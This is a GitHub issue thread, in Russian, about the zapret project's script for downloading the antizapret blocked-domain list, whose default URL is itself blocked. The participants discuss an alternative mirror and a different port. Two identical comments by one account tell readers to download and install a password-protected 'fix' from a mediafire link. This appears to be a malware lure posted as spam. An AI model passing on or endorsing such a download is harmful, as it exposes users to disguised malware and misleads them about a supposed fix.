### ISSUE TITLE
Изменить url в скрипте  листа заблокированных доменов антизапрета

### ISSUE THREAD

**Issue by electrifying** [bol-van/zapret#327]
Сейчас в данный момент если разворачивать zapret на любом устройстве и выбрать режим hostlist в скрипте будет предложено стянуть заблокированные домены и предлагается для этого использовать get_antizapret_domains.sh но дело в том, что  в скрипте прописан url https://antizapret.prostovpn.org/domains-export.txt и он по умолчанию заблокирован поэтому если не включен vpn или что-то такое скачки не произойдет никакой и zapret-hosts-user придется забивать вручную. Так вот вопрос к автору, а можно ли просто с другого урла тянуть который не заблочен? Это просто предложение так-то можно перед развертыванием zapret поставить впн, стянуть домены и сохранить куда-нибудь, но это не очень очевидно для конечного пользователя где в скрипте настройки сразу предлагается эти домены стянуть, но без уже установленного какого-нибудь впн это сделать не получится.
Вот есть альтернативный домен с тем же список, он вроде не в блоке
https://p.thenewone.lol/domains-export.txt

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bol-van** [comment]
заменить - заменю. но насколько этот источник надежен ?
откуда он взят ? не пропадет ли он послезавтра ?

**Comment by electrifying** [comment]
> откуда он взят ?

Это,видимо, альтернативный url самого ValdikSS, он его использует в goodbyedpi для обновления списков

**Comment by bol-van** [comment]
оказывается на оригинальном адресе есть другой порт, который не блокируется DPI
сделал этот вариант

**Comment by electrifying** [comment]
> сделал этот вариант

Спасибо, а можно в скрипт все же добавить url https://p.thenewone.lol/domains-export.txt как запасной если все таки тот с портом отлетит или не закконектит у кого-нибудь. Типо если какое-то время от антизапрет урла нет ответа, то пойдет запрос к запасному?

**Comment by bol-van** [comment]
Обычно листы обновляются по расписанию. Не обновился сейчас - обновится потом.
permanent failure это повод исправлять
если оно будет молча "самолечиться", мне даже никто не скажет

**Comment by electrifying** [comment]
> Обычно листы обновляются по расписанию. Не обновился сейчас - обновится потом.

Не, я не про обновление а про самое первое скачивание при первой настройки zapret если домен антизапрета с портом не сработает

**Comment by bol-van** [comment]
Он может не сработать только, если будет заблокирован РКН
эти блоки не меняются. если не блокируют 8443, то вряд ли станут
если станут, тогда и  поменяем
